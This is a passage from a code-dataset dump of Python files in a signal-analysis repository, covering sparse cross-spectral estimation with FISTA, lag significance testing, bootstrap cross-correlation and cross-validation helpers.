'norm2',\n 'period', 'freq']][df_x.norm12 > 0]\n if anti:\n df_sum = _make_antisum(df_sum)\n\n return df_sum\n\n\ndef _make_periodicsum(x, freqinfo, lagrange):\n # load df_sum\n df_sum = _make_summary(x, freqinfo)\n n_ori = df_sum.shape[0]\n\n # duplicate periodical counterparts\n sumdata = df_sum.values\n for row in df_sum.itertuples(index=False):\n # get periodical lag\n lagdup_plus = np.arange(row.lag, lagrange[1], row.period)\n lagdup_minu = -np.arange(-row.lag, np.abs(lagrange[0]), row.period)\n lagdup = np.unique(np.hstack([lagdup_plus, lagdup_minu, row.lag]))\n\n # append to sumdata\n sumdata_dup = np.tile(row, (len(lagdup), 1))\n sumdata_dup[:, 0] = lagdup\n sumdata = np.append(sumdata, sumdata_dup, axis=0)\n\n # recreate df_sum for output\n df_sum_out = pd.DataFrame(sumdata[n_ori:], columns=df_sum.columns)\n return df_sum_out\n\n\ndef _make_periodicsumold(x, freqinfo, peridicrange):\n df_sum = _make_summary(x, freqinfo)\n columns = df_sum.columns.values\n ndarray_sum = df_sum.values\n for para in list(ndarray_sum):\n (lag, norm12, norm1, norm2, period, freq) = para\n # plus\n i = 0\n lag_peri = lag\n while peridicrange[0] < lag + (i*period) <= peridicrange[1]:\n lag_peri = lag + (i*period)\n new_col = np.array([lag_peri, norm12, norm1,\n norm2, period, freq])\n ndarray_sum = np.vstack([ndarray_sum, new_col])\n i += 1\n # munus\n i = -1\n lag_peri = lag - period\n # while lag_peri > peridicrange[0]:\n while peridicrange[0] < lag + (i*period) <= peridicrange[1]:\n lag_peri = lag + (i*period)\n new_col = np.array([lag_peri, norm12, norm1,\n norm2, period, freq])\n ndarray_sum = np.vstack([ndarray_sum, new_col])\n i += -1\n df_sum_out = pd.DataFrame(ndarray_sum, columns=columns)\n return df_sum_out\n\n\ndef _search_index(a, v):\n idx_out = []\n for vv in v:\n idx_match = int(np.where(a == vv)[0])\n idx_out.append(idx_match)\n return np.array(idx_out)\n\n\ndef _make_antisum(df_sum):\n df_sum_out = df_sum.copy()\n df_sum_out.loc[:, 'lag'] = list(map(\n lambda lag, peri: lag - peri/2 if lag >= 0 else lag + peri/2,\n df_sum_out['lag'], df_sum_out['period']))\n return df_sum_out\n\n\n# main 
functions\n\ndef query_forX(X, freqinfo, para, pararanges,\n mode='ext', anti=False, periodic=False):\n\n '''\n '''\n X_out = _adjuster_forX(_query_forX, X, freqinfo, para, pararanges,\n mode=mode, anti=anti, periodic=periodic)\n return X_out\n\n\ndef _query_forX(x, freqinfo, para, pararanges,\n mode='ext', anti=False, periodic=False):\n\n # get basic quantity\n df_sum = _make_summary(x, freqinfo, anti=anti)\n if periodic:\n periodicrange = np.quantile(df_sum.lag, [0.01, 0.99])\n df_sum = _make_periodicsum(x, freqinfo, periodicrange)\n freqs = _get_freq(freqinfo)\n pararanges = np.array(pararanges)\n\n # make the shape of pararanges (:,2) even if\n # the original shape is (:, 1)\n if isinstance(pararanges[0], np.ndarray) is False:\n pararanges = [pararanges]\n\n # if para = 'ratio', then make ratio\n if para == 'ratio':\n df_sum['ratio'] = list(map(lambda n1, n2: n1/n2 if n1 < n2 else n2/n1,\n df_sum.norm1, df_sum.norm2))\n\n # search lag components and put 0\n flags = np.zeros(freqs.shape[0])\n for pararange in pararanges:\n freq_quer = df_sum.query(\n f'{pararange[0]} <= {para} < {pararange[1]}').freq\n idx_quer = _search_index(freqs, freq_quer)\n if idx_quer.size != 0:\n flags[idx_quer] = 1\n\n # reverse if 'cut' mode\n if 'cut' in mode:\n flags = 1 - flags\n\n # extract x where flag == 1\n x_out = x * np.tile(flags, 4)\n return x_out\n\n\ndef signiftest(X, freqinfo, testrange, lagbinwidth=1,\n iteration=1000, ci=0.9, periodic=False,\n anti=False):\n '''\n '''\n X_out = _adjuster_forX(_signiftest, X, freqinfo, testrange,\n lagbinwidth=lagbinwidth,\n iteration=iteration, ci=ci,\n periodic=periodic, anti=anti)\n return X_out\n\n\ndef _signiftest(x, freqinfo, testrange, lagbinwidth=1,\n iteration=1000, ci=0.9, periodic=False,\n anti=False):\n\n df_sum = _make_summary(x, freqinfo, anti=anti)\n tester = LagSignifTest(df_sum, lagrange=testrange,\n lag_binwidth=lagbinwidth)\n tester.make_model(iteration=iteration)\n signifrange = tester.get_signifrange(ci=ci)\n x_signif = query_forX(x, freqinfo, para='lag',\n pararanges=signifrange,\n periodic=periodic)\n return x_signif\n\n\ndef subtractX(X_minuend, X_subtrahend):\n X_mask = np.where(X_subtrahend == 0, 1, 0)\n X_diff = X_minuend * X_mask\n return X_diff\n\n\ndef addX(*X_addends):\n X_sum = X_addends[0].copy()\n for X_addend in X_addends[1:]:\n cond_nonzero = (X_addend != 0)\n X_sum[cond_nonzero] += X_addend[cond_nonzero]\n return X_sum\n\n\ndef _adjuster_forX(func, X, *args, **kargs):\n '''Adjuster for a X.\n By using this, it is possible to use\n functions without taking care of the\n shape of the X.\n '''\n # for cs\n if len(X.shape) == 1:\n X_out = func(X, *args, **kargs)\n # for stcs\n elif len(X.shape) == 2:\n X_out = X.copy()\n for i, x in enumerate(X.T):\n X_out[:, i] = func(x, *args, **kargs)\n return X_out\n\n\ndef main():\n freqinfo = [0, 0.5, 2000]\n X = np.loadtxt('../example/X.dat')\n lags, powsums = phist(X, freqinfo, lagrange=[-10, 10])\n\n x_cut = query_forX(X, freqinfo, 'lag', [-2, 2], 'cut', periodic=True)\n testrange = [-10, 10]\n x_signif = signiftest(x_cut, freqinfo, testrange, iteration=100,\n periodic=True)\n print(x_signif)\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.7692307829856873,
"alphanum_fraction": 0.7692307829856873,
"avg_line_length": 25,
"blob_id": "1c4ff1de73a7b9c7c0ee84db46fed76fef3bb4c3",
"content_id": "01426c7fd747610135a31e80ada940465fcbddb4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 26,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 1,
"path": "/csa/__init__.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "from . import make_matrix\n"
},
{
"alpha_fraction": 0.5296989679336548,
"alphanum_fraction": 0.553702175617218,
"avg_line_length": 26.010988235473633,
"blob_id": "3c2b6b7f8de23ef2be34e0aa18eda3733773d01e",
"content_id": "7bd6d7a8d0238485c9f42b57eac145a9520ed35c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2458,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 91,
"path": "/example/bootstrap/ccfbootstrap.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import os\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import zscore\nfrom scipy import signal\nfrom tqdm import tqdm, trange\n\n# decorators\n\ndef stopwatch(func):\n def wrapper(*arg, **kargs):\n start = time.time()\n print(f'start {func.__name__}')\n res = func(*arg, **kargs)\n dura = (time.time() - start)\n print(time.strftime(f'finish {func.__name__}: %H:%M\\'%S\\\"',\n time.gmtime(dura)))\n return res\n return wrapper\n\n\ndef change_directory(path_to_dir):\n def _change_directory(func):\n def wrapper(*args, **kargs):\n current_dir = os.getcwd()\n if os.path.exists(path_to_dir) is False:\n os.makedirs(path_to_dir)\n os.chdir(path_to_dir)\n results = func(*args, **kargs)\n os.chdir(current_dir)\n return(results)\n return wrapper\n return _change_directory\n\n\ndef ccf(x, y, fs=1, maxlags=None):\n # standardized\n x, y = zscore(x), zscore(y)\n\n # calcurate correlation and lags\n n_x, n_y = len(x), len(y)\n T = max(n_x, n_y)\n r = signal.correlate(y, x, mode='full') / T\n lags = np.arange(-n_x + 1, n_y) / fs\n\n # query\n maxlags = 2 * T - 1 if maxlags is None else maxlags\n lag_out = lags[((-maxlags <= lags) & (lags <= maxlags))]\n r_out = r[((-maxlags <= lags) & (lags <= maxlags))]\n return lag_out, r_out\n\n\ndef ccfbootstrap(Y1, Y2, fs=1, q=(0.025, 0.5, 0.975), maxlags=None):\n\n # check whether the shapes of Y1 and Y2 are the same.\n assert Y1.shape == Y2.shape, \\\n f'the sizes of Y1 and Y2 must be the same: \\\n {Y1.shape} != {Y2.shape}'\n\n # ccf\n C = []\n for i in range(len(Y1)):\n lags, c = ccf(Y1[i], Y2[i], fs=fs, maxlags=maxlags)\n C.append(c)\n C = np.array(C)\n\n # get quantile\n c_low, c_med, c_hig = np.quantile(C, q, axis=0)\n return lags, c_low, c_med, c_hig\n\n\n@change_directory('example')\ndef main():\n data1 = np.loadtxt('xdata.dat')\n data2 = np.loadtxt('odata.dat')\n\n nlc = 10000\n Y1 = np.tile(data1[:,1].T, (nlc, 1))\n Y1 += np.random.normal(0, 2*data1[:,1].std(), Y1.shape)\n Y2 = np.tile(data1[:,1].T, (nlc, 1))\n Y2 += np.random.normal(0, 2*data2[:,1].std(), Y2.shape)\n\n lags, c_low, c_med, c_hig = ccfbootstrap(Y1, Y2)\n plt.fill_between(lags, c_low, c_hig, alpha=.5)\n plt.plot(lags, c_med)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.432534396648407,
"alphanum_fraction": 0.4678206741809845,
"avg_line_length": 27.700637817382812,
"blob_id": "bb67d8b8d875dfab1f4a7b48c1d027dd7acff4bb",
"content_id": "89830ee8e89d7690fbfe77637aac1377002838ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4506,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 157,
"path": "/csa/fista.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\n\nfrom csa.make_matrix import mkmat_cs, mkmat_cs_w\n\n\ndef soft_thres(a, b, c, d, L, lam):\n ''' Calcurate soft threshold\n '''\n l = np.sqrt(a**2 + b**2 + c**2 + d**2) * L\n ans = 0.0\n if lam < l:\n ans = 1.0 - lam /l\n elif -lam <= l and l <= lam:\n ans = 0.0\n elif l < -lam:\n ans = 1.0 + lam /l\n return ans\n\ndef prox_map(y, L, A_mat, h_vec, lam):\n b = y - 2.0/L * np.dot(A_mat.T, np.dot(A_mat, y) - h_vec)\n N2 = b.shape[0]\n N = N2 / 2\n b_new = np.repeat(0.0, 2 * N)\n for i in range(int(N/2)):\n factor = soft_thres(b[i],\n b[int(i + N/2)],\n b[int(i + N)],\n b[int(i + N/2 * 3)], L, lam)\n b_new[int(i)] = b[int(i)] * factor\n b_new[int(i + N/2)] = b[int(i + N/2)] * factor\n b_new[int(i + N)] = b[int(i + N)] * factor\n b_new[int(i + N/2 * 3)] = b[int(i + N/2 * 3)] * factor\n return b_new\n\ndef g_func(J_vec, lam):\n N2 = J_vec.shape[0]\n N = N2 / 2\n sigsum = 0.0\n for i in range(int(N/2)):\n sigsum = sigsum + np.sqrt(J_vec[int(i + N/2 * 0)]**2 +\n J_vec[int(i + N/2 * 1)]**2 +\n J_vec[int(i + N/2 * 2)]**2 +\n J_vec[int(i + N/2 * 3)]**2)\n ans = lam * sigsum\n return ans\n\ndef f_func(J_vec, A_mat, h_vec):\n vec_tmp = h_vec - np.dot(A_mat, J_vec)\n ans = np.dot(vec_tmp, vec_tmp.T)\n return ans\n\ndef fg_func(J_vec, A_mat, h_vec, lam):\n return f_func(J_vec, A_mat, h_vec) + g_func(J_vec, lam)\n\ndef diff_func(y, A_mat, h_vec):\n return 2 * np.dot(A_mat.T, np.dot(A_mat, y) - h_vec)\n\ndef q_func(x, y, L, A_mat, h_vec, lam):\n term1 = f_func(y, A_mat, h_vec)\n term2 = np.sum((x - y) * diff_func(y, A_mat, h_vec))\n term3 = L / 2.0 * np.dot((x - y).T, x - y)\n term4 = g_func(x, lam)\n ans = term1 + term2 + term3 + term4\n return ans\n\ndef find_ik(y, L_pre, eta, A_mat, h_vec, lam):\n ik_max = 1000\n ik = 0\n while ik <= ik_max:\n L = eta**ik * L_pre\n pLy = prox_map(y, L, A_mat, h_vec, lam)\n fgfunc_val = fg_func(pLy, A_mat, h_vec, lam)\n qfunc_val = q_func(pLy, y, L, A_mat, h_vec, lam)\n if fgfunc_val <= qfunc_val:\n break\n ik = ik + 1\n return ik\n\ndef _get_frecvec(freqinfo):\n freq_edge = np.linspace(freqinfo[0],\n freqinfo[1],\n int(freqinfo[2] + 1))\n freq_vec = (freq_edge[:-1] + freq_edge[1:]) / 2\n return freq_vec\n\ndef fista(data1, data2, freqinfo, lam):\n\n # frequency setup\n freq_lo = freqinfo[0]\n freq_up = freqinfo[1]\n nfreq = freqinfo[2]\n delta_freq = (freq_up - freq_lo) / nfreq\n freqdata = _get_frecvec(freqinfo)\n\n # make matrix file\n A_mat = mkmat_cs(data1[:,0], data2[:,0], freqdata)\n A_w_mat = mkmat_cs_w(data1[:,0], data2[:,0], freqdata)\n\n # prepare for estimation\n nrow1 = data1.shape[0]\n nrow2 = data2.shape[0]\n ncol = A_mat.shape[1]\n\n data = np.hstack([data1, data2])\n\n h_vec = np.hstack([data1[:,1] * np.sqrt(nrow2),\n data2[:,1] * np.sqrt(nrow1)])\n\n # estimation\n tolerance = 5.e-8\n eta = 1.2\n x = np.repeat(0.0, ncol)\n x_pre = x\n y = x\n L = 1e-3\n L_pre = L\n k_max = 500\n t = 1\n\n cost = 0.0\n cost_pre = cost\n for k in range(k_max):\n ik = find_ik(y, L_pre, eta, A_w_mat, h_vec, lam)\n L = eta**ik * L_pre\n x = prox_map(y, L, A_w_mat, h_vec, lam)\n t_new = (1. + np.sqrt(1. 
+ 4 * t**2))/2.\n y_new = x + (t - 1.)/ t_new * (x - x_pre)\n x_pre = x\n y = y_new\n t = t_new\n L_pre = L\n\n cost = fg_func(y_new, A_w_mat, h_vec, lam)\n if k > 1 and (cost_pre - cost) / cost < tolerance:\n # print('k: {}'.format(k))\n # print('cost: {}'.format(cost))\n break\n cost_pre = cost\n\n return freqdata, x\n\nif __name__ == '__main__':\n infile1 = 'lc1.dat'\n infile2 = 'lc2.dat'\n freqinfo = [0, 0.5, 200]\n x = fista(infile1, infile2, freqinfo, 1)\n df_x = pd.DataFrame({'a': x[:200],\n 'b': x[200:400],\n 'c': x[400:600],\n 'd': x[600:800]})\n from summary import make_summary\n import matplotlib.pyplot as plt\n df_sum = make_summary(x, freqinfo)\n plt.scatter(df_sum.lag, df_sum.norm12)\n plt.show()\n print(df_sum)\n"
},
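The heart of `fista.py` above is a *group* soft-threshold: for each frequency the four coefficients (a, b, c, d) are shrunk toward zero by a common factor, so a whole frequency drops out at once. A minimal standalone sketch of that shrinkage (not part of the repository; the repo's `soft_thres` folds the FISTA step size `L` into the same factor):

```python
import numpy as np

def group_shrink(v, lam):
    # shrink the coefficient group v toward zero by lam in the L2 sense;
    # the whole group is zeroed once its norm falls below lam
    norm = np.linalg.norm(v)
    factor = max(0.0, 1.0 - lam / norm) if norm > 0 else 0.0
    return factor * v

v = np.array([3.0, 4.0, 0.0, 0.0])   # ||v|| = 5
print(group_shrink(v, lam=2.0))      # scaled by 1 - 2/5: [1.8, 2.4, 0., 0.]
print(group_shrink(v, lam=6.0))      # lam >= ||v||: [0., 0., 0., 0.]
```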
{
"alpha_fraction": 0.5825688242912292,
"alphanum_fraction": 0.5894495248794556,
"avg_line_length": 22.567567825317383,
"blob_id": "037a0c75ae8fff83a498199e49732c351c902795",
"content_id": "41662bd5ed7db6de64d5e07357a716169dcb12d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 872,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 37,
"path": "/csa/cvresult.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\n\n\ndef lambda_fromcvdata(cvdata, mode='min'):\n\n # get index at minmun \n idx_min = cvdata[:,1].argmin()\n\n if mode == 'min':\n return cvdata[idx_min, 0]\n\n elif mode == 'ose':\n\n # MSE + error at minmun MSE\n mse_p_std_min = cvdata[idx_min_data, 1:].sum()\n\n # search the lambda which MSE is close to\n # the MSE + error at the minum.\n idx_ose = np.searchsorted(cvdata[idx_min:], mse_p_std_min)\n return cvdata[idx_min + idx_ose]\n\n\ndef show_cvdata(cvdata, ax=None):\n\n # make ax if None\n if ax is None:\n fig, ax = plt.subplots()\n\n # figure\n ax.errorbar(cvdata[:,0], cvdata[:,1], cvdata[:,2], fmt='o')\n ax.set_xscale('log')\n ax.set_yscale('log')\n ax.set_xlabel(r'$\\lambda$')\n ax.set_ylabel('MSE')\n return ax\n"
},
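A worked sketch of the two selection modes in `lambda_fromcvdata` above, using a made-up CV table (columns: lambda, mean MSE, MSE std). `mode='min'` takes the MSE minimum; `mode='ose'` walks right from the minimum until the MSE reaches the minimum-plus-one-standard-error level:

```python
import numpy as np

# hypothetical CV result: (lambda, mean MSE, MSE std) per row
cvdata = np.array([[0.1, 9.0, 0.5],
                   [1.0, 4.0, 0.4],
                   [10.0, 5.0, 0.6],
                   [100.0, 8.0, 0.9]])

idx_min = cvdata[:, 1].argmin()
lam_min = cvdata[idx_min, 0]                        # mode='min' -> 1.0
target = cvdata[idx_min, 1:].sum()                  # MSE + std at the minimum: 4.4
idx_ose = np.searchsorted(cvdata[idx_min:, 1], target)
lam_ose = cvdata[idx_min + idx_ose, 0]              # mode='ose' -> 10.0
print(lam_min, lam_ose)
```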
{
"alpha_fraction": 0.5301645398139954,
"alphanum_fraction": 0.5658135414123535,
"avg_line_length": 27.415584564208984,
"blob_id": "2d4f689608295522205f9412ba62077bae6ef484",
"content_id": "9af52fee91d8697e616d3c7ec4cd3e8b5956f0f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2188,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 77,
"path": "/csa/bootstrap.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import zscore\nfrom scipy import signal\n\nfrom csa.deco import change_directory\n\n\ndef ccf(x, y, fs=1, maxlags=None):\n # standardized\n x, y = zscore(x), zscore(y)\n\n # calcurate correlation and lags\n n_x, n_y = len(x), len(y)\n T = max(n_x, n_y)\n r = signal.correlate(y, x, mode='full') / np.std(x) / np.std(y) / T\n # r = signal.correlate(y, x, mode='full') / T\n lags = np.arange(-n_x + 1, n_y) / fs\n\n # query\n maxlags = 2 * T - 1 if maxlags is None else maxlags\n lag_out = lags[((-maxlags <= lags) & (lags <= maxlags))]\n r_out = r[((-maxlags <= lags) & (lags <= maxlags))]\n return lag_out, r_out\n\n\ndef ccfbootstrap(Y1, Y2, droprate=0.0, fs=1,\n q=(0.025, 0.5, 0.975), maxlags=None):\n\n # check whether the shapes of Y1 and Y2 are the same.\n assert Y1.shape == Y2.shape, \\\n f'the sizes of Y1 and Y2 must be the same: \\\n {Y1.shape} != {Y2.shape}'\n\n # ccf\n C = []\n for i in range(len(Y1)):\n lags, c = ccf(Y1[i], Y2[i], fs=fs, maxlags=maxlags)\n C.append(c)\n C = np.array(C)\n\n # get quantile\n c_low, c_med, c_hig = np.quantile(C, q, axis=0)\n c_lowdev = (c_med - c_low) * np.sqrt(1-droprate)\n c_higdev = (c_med - c_low) * np.sqrt(1-droprate)\n return lags, c_med-c_lowdev, c_med, c_med+c_higdev\n\n\ndef lcbootstrap(Y, droprate=0.0, q=(0.025, 0.5, 0.975)):\n\n # get quantile\n y_low, y_med, y_hig = np.quantile(Y, q, axis=0)\n y_lowdev = (y_med - y_low) * np.sqrt(1-droprate)\n y_higdev = (y_med - y_low) * np.sqrt(1-droprate)\n\n return y_med-y_lowdev, y_med, y_med+y_higdev\n\n\n@change_directory('../example')\ndef main():\n data1 = np.loadtxt('xdata.dat')\n data2 = np.loadtxt('odata.dat')\n\n nlc = 10000\n Y1 = np.tile(data1[:, 1].T, (nlc, 1))\n Y1 += np.random.normal(0, 2*data1[:, 1].std(), Y1.shape)\n Y2 = np.tile(data1[:, 1].T, (nlc, 1))\n Y2 += np.random.normal(0, 2*data2[:, 1].std(), Y2.shape)\n\n lags, c_low, c_med, c_hig = ccfbootstrap(Y1, Y2)\n plt.fill_between(lags, c_low, c_hig, alpha=.5)\n plt.plot(lags, c_med)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n"
},
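The sign convention of `ccf` above (a positive lag means the second series trails the first) can be checked with a synthetic delay; this standalone sketch on made-up data uses the same `scipy.signal.correlate` call and lag grid:

```python
import numpy as np
from scipy.stats import zscore
from scipy import signal

rng = np.random.default_rng(0)
x = rng.normal(size=500)
y = np.roll(x, 25)                      # y trails x by 25 samples

xs, ys = zscore(x), zscore(y)
r = signal.correlate(ys, xs, mode='full') / len(x)
lags = np.arange(-len(x) + 1, len(y))   # same lag grid as ccf()
print(lags[r.argmax()])                 # 25
```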
{
"alpha_fraction": 0.7428571581840515,
"alphanum_fraction": 0.7428571581840515,
"avg_line_length": 16.5,
"blob_id": "541e779c5f94587a6c364c2db74fad4c2c952fb0",
"content_id": "5491842be05c3bf7439ad7920e5a889ac9a43a58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 35,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "# CSA\nCommon Signal Analysis (CSA)\n"
},
{
"alpha_fraction": 0.5298013091087341,
"alphanum_fraction": 0.5761589407920837,
"avg_line_length": 32.03125,
"blob_id": "d7f0830d9e5a18272f6e63cdf2b78a4cd4c29ce2",
"content_id": "66e19cac66d672c6204e3a28068477959807498f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1057,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 32,
"path": "/csa/make_matrix.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\ndef make_matrix(t, f):\n t = np.array([t]).astype(float)\n f = np.array([f]).astype(float)\n phase = 2 * np.pi * np.dot(t.T, f)\n mat = np.hstack([np.cos(phase), np.sin(phase)])\n return mat\n\ndef mkmat_cs(t1, t2, freq_vec):\n delta_f = np.mean(np.diff(freq_vec))\n mat_a1 = 2 * delta_f * make_matrix(t1, freq_vec)\n mat_a2 = 2 * delta_f * make_matrix(t2, freq_vec)\n mat_b1 = np.zeros_like(mat_a2)\n mat_b2 = np.zeros_like(mat_a1)\n mat_1 = np.hstack([mat_a1, mat_b1])\n mat_2 = np.hstack([mat_b2, mat_a2])\n mat = np.vstack([mat_1, mat_2])\n return mat\n\ndef mkmat_cs_w(t1, t2, freq_vec):\n N1 = t1.shape[0]\n N2 = t2.shape[0]\n delta_f = np.mean(np.diff(freq_vec))\n mat_a1 = 2 * delta_f * make_matrix(t1, freq_vec) * np.sqrt(N2)\n mat_a2 = 2 * delta_f * make_matrix(t2, freq_vec) * np.sqrt(N1)\n mat_b1 = np.zeros_like(mat_a2)\n mat_b2 = np.zeros_like(mat_a1)\n mat_1 = np.hstack([mat_a1, mat_b1])\n mat_2 = np.hstack([mat_b2, mat_a2])\n mat = np.vstack([mat_1, mat_2])\n return mat\n"
},
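The column layout produced by `make_matrix` (a cosine block followed by a sine block, one column per frequency) can be verified with a coefficient vector that selects a single frequency. A small standalone sketch using the same construction:

```python
import numpy as np

t = np.linspace(0, 10, 50)
freqs = np.array([0.1, 0.2, 0.3])

# same construction as make_matrix: cos columns, then sin columns
phase = 2 * np.pi * np.dot(np.array([t]).T, np.array([freqs]))
A = np.hstack([np.cos(phase), np.sin(phase)])   # shape (50, 6)

x = np.array([0.0, 1.0, 0.0, 0.0, 0.0, 0.0])    # picks the cos(2*pi*0.2*t) column
print(np.allclose(A @ x, np.cos(2 * np.pi * 0.2 * t)))  # True
```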
{
"alpha_fraction": 0.5520987510681152,
"alphanum_fraction": 0.5711110830307007,
"avg_line_length": 33.3220329284668,
"blob_id": "9c499e269a0d7bc00b730ba2897b7a8fcb938617",
"content_id": "668aebdf7a8bc3f6e7870dbeebad5856be4d904b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4050,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 118,
"path": "/csa/signiftest.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "from concurrent.futures import ProcessPoolExecutor\nimport os\n\nimport numpy as np\nimport pandas as pd\n\nncpu = os.cpu_count()\nMAX_WORKERS = ncpu\n# print(f'number of cpu: {ncpu}')\n\n\ndef set_bins(low, hig, binsize):\n low = float(round(low, 10))\n hig = float(round(hig, 10))\n # Get digit\n dig_low = str(low).split(\".\")[1]\n dig_hig = str(hig).split(\".\")[1]\n nd_max = len(dig_low) if len(dig_low) >= len(dig_hig) else len(dig_hig)\n # Float into integer\n low_trans = low * np.power(10, nd_max)\n hig_trans = hig * np.power(10, nd_max)\n binsize_trans = binsize * np.power(10, nd_max)\n # Make bins\n bins = np.arange(low_trans, hig_trans + binsize_trans, binsize_trans)\n # Change digit into original\n bins = bins / np.power(10, nd_max)\n return bins\n\n\ndef _make_model(periods, lagbins):\n lags = np.random.rand(len(periods))*periods - periods/2\n lagdistmodel = pd.cut(lags, bins=lagbins).value_counts().values\n return lagdistmodel\n\n\nclass LagSignifTest:\n\n def __init__(self, df_sum, lagrange=[-0.5, 0.5], lag_binwidth=.1):\n '''\n basic flow is below\n 1. make random sample\n 2. compare sample with model\n '''\n # summary\n self.lag = df_sum['lag'].values\n self.norm12 = df_sum['norm12'].values\n self.norm1 = df_sum['norm1'].values\n self.norm2 = df_sum['norm2'].values\n self.period = df_sum['period'].values\n self.freq = df_sum['freq'].values\n\n # lagrange\n self.lagrange = lagrange\n self.lag_binwidth = lag_binwidth\n\n def make_model(self, iteration=1000):\n '''make rondom model\n '''\n lagbins = set_bins(self.lagrange[0], self.lagrange[1],\n self.lag_binwidth)\n lagdistmodels = np.zeros((iteration, lagbins.shape[0]-1))\n with ProcessPoolExecutor(MAX_WORKERS) as executor:\n futures = [executor.submit(_make_model, periods=self.period,\n lagbins=lagbins)\n for i in range(iteration)]\n for i, future in enumerate(futures):\n lagdistmodels[i] = future.result()\n\n self.lagbins = lagbins\n self.iteration = iteration\n self.n_model_tile = lagdistmodels\n\n def get_signifrange(self, ci=.68, retbins=False, verbose=False):\n ''' get significance lag range\n '''\n lagbins = set_bins(self.lagrange[0], self.lagrange[1],\n self.lag_binwidth)\n laglabel_list = np.array(list(zip(lagbins[:-1], lagbins[1:])))\n n_sample_list = pd.cut(self.lag, bins=lagbins).value_counts().values\n n_atci_list = []\n for i in range(len(self.n_model_tile[0, :])):\n n_atci = np.percentile(self.n_model_tile[:, i], 100*ci)\n n_atci_list.append(n_atci)\n n_atci_list = np.array(n_atci_list)\n lag_ci_list = laglabel_list[n_sample_list >= n_atci_list]\n if verbose:\n print('lag : {}'.format(lagbins))\n print('sample: {}'.format(n_sample_list))\n print('ci {}%: {}'.format(int(ci*100), n_atci_list))\n if retbins:\n return lag_ci_list, lagbins\n else:\n return lag_ci_list\n\n def get_civalue(self, ci):\n ''' get cignificance value\n '''\n n_atci_list = []\n for i in range(len(self.n_model_tile[0, :])):\n n_atci = np.percentile(self.n_model_tile[:, i], 100*ci)\n n_atci_list.append(n_atci)\n n_atci_list = np.array(n_atci_list)\n return self.lagbins, n_atci_list\n\n\nif __name__ == \"__main__\":\n\n df_sum = pd.read_csv(\n 'example/out/sum.dat', sep=' ',\n names=['lag', 'norm12', 'norm1', 'norm2', 'period', 'freq'])\n\n tester = LagSignifTest(df_sum)\n tester.make_model(iteration=1000)\n signif_ci90 = tester.get_signifrange(ci=.9)\n print('signif range: {}'.format(signif_ci90))\n bins, ci90_list = tester.get_civalue(0.90)\n print('bins : {}'.format(bins))\n print('ci 90: {}'.format(ci90_list))\n"
},
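The null model behind `LagSignifTest` is simple: if no lag were preferred, each component's lag would be uniform within plus or minus half its period. One realization of that model, mirroring `_make_model` with invented periods (a `pd.Series` wrapper and `sort=False` are used here to keep the counts in bin order):

```python
import numpy as np
import pandas as pd

rng = np.random.default_rng(1)
periods = 1.0 / rng.uniform(0.1, 0.5, size=200)   # hypothetical periods
lagbins = np.arange(-0.5, 0.51, 0.1)              # the grid set_bins(-0.5, 0.5, 0.1) builds

# lags drawn uniformly in [-period/2, period/2), as in _make_model
lags = rng.random(len(periods)) * periods - periods / 2
null_counts = pd.Series(pd.cut(lags, bins=lagbins)).value_counts(sort=False).values
print(null_counts)
```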
{
"alpha_fraction": 0.5326530337333679,
"alphanum_fraction": 0.5887755155563354,
"avg_line_length": 27,
"blob_id": "51bce865d7ca6564bf06ee06b8add004b83ea19a",
"content_id": "83f9f1634857ad4e848088e684a56141b6faf67e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 980,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 35,
"path": "/example/example.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
